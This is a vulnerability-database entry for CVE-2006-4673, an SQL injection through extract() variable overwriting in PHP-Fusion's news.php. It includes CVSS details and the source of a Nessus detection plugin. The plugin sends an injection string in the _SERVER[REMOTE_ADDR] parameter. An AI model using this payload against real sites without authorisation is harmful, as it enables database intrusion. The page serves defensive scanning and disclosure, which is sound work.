Vulnerabilities > CVE-2006-4673 - SQL Injection vulnerability in PHP-Fusion News.PHP

047910
CVSS 2.6 - LOW
Attack vector
NETWORK
Attack complexity
HIGH
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
high complexity
php-fusion
nessus
exploit available
NVD
Published: 2006-09-11
Updated: 2017-07-20

Summary

Global variable overwrite vulnerability in maincore.php in PHP-Fusion 6.01.4 and earlier uses the extract function on the superglobals, which allows remote attackers to conduct SQL injection attacks via the _SERVER[REMOTE_ADDR] parameter to news.php. Successful exploitation requires that "register_globals" and "magic_quotes_gpc" are disabled. This vulnerability is addressed in the following product release: PHP-Fusion, PHP_Fusion, 6.01.5

Vulnerable Configurations

Part Description Count
Application
Php_Fusion
12

Exploit-Db

descriptionPHP-Fusion 6.0.x News.PHP SQL Injection Vulnerability. CVE-2006-4673. Webapps exploit for php platform
idEDB-ID:28496
last seen2016-02-03
modified2006-09-07
published2006-09-07
reporterrgod
sourcehttps://www.exploit-db.com/download/28496/
titlePHP-Fusion 6.0.x News.PHP SQL Injection Vulnerability

Nessus

NASL familyCGI abuses
NASL idPHP_FUSION_EXTRACT_SQL_INJECTIONS.NASL
descriptionThe version of PHP-Fusion on the remote host supports registering variables from user-supplied input in the event that PHP
last seen2020-06-01
modified2020-06-02
plugin id22316
published2006-09-08
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/22316
titlePHP-Fusion extract() Global Variable Overwriting
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(22316);
  script_version("1.23");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2006-4673");
  script_bugtraq_id(19908, 19910);

  script_name(english:"PHP-Fusion extract() Global Variable Overwriting");
  script_summary(english:"Tries to overwrite $_SERVER[REMOTE_ADDR] with PHP-Fusion");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server hosts a PHP script that is affected by a
variable overwriting flaw."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of PHP-Fusion on the remote host supports registering
variables from user-supplied input in the event that PHP's
'register_globals' setting is disabled, which is the default in
current versions of PHP.  Unfortunately, the way that this has been
implemented in the version on the remote host does not restrict the
variables that can be registered.  Consequently, an unauthenticated,
remote attacker can leverage this flaw to launch various attacks
against the affected application."
  );
  # https://web.archive.org/web/20120402151936/http://retrogod.altervista.org/phpfusion_6-01-4_xpl.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?27bfc08c");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/445480/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"https://www.php-fusion.co.uk/infusions/news/news.php?readmore=353");
   script_set_attribute(attribute:"solution", value:"Upgrade to version 6.01.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/08");
  script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2006/09/02");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:php_fusion:php_fusion");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("php_fusion_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/php_fusion", "www/PHP");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("audit.inc");

port = get_http_port(default:80, php:TRUE);

# Test an install.
install = get_install_from_kb(
  appname      : "php_fusion",
  port         : port,
  exit_on_fail : TRUE
);
dir = install["dir"];

# Try to exploit the flaw to generate a SQL error.
host = rand() % 255 + "." + rand() % 255 + "." + rand() % 255 + ".111" +
  "'/**/UNION+SELECT+" + SCRIPT_NAME + "--";

r = http_send_recv3(
  method     : "GET",
  port       : port,
  item       : dir + "/news.php?" + "_SERVER[REMOTE_ADDR]=" + host,
  exit_on_fail : TRUE
);

# There's a problem if we see an error w/ the first 3 octets of our "host".
if (string("syntax to use near '", host - strstr(host, ".111"), "''") >< r[2])
{
  security_note(port);
  set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, "PHP-Fusion", build_url(qs:dir, port:port));

References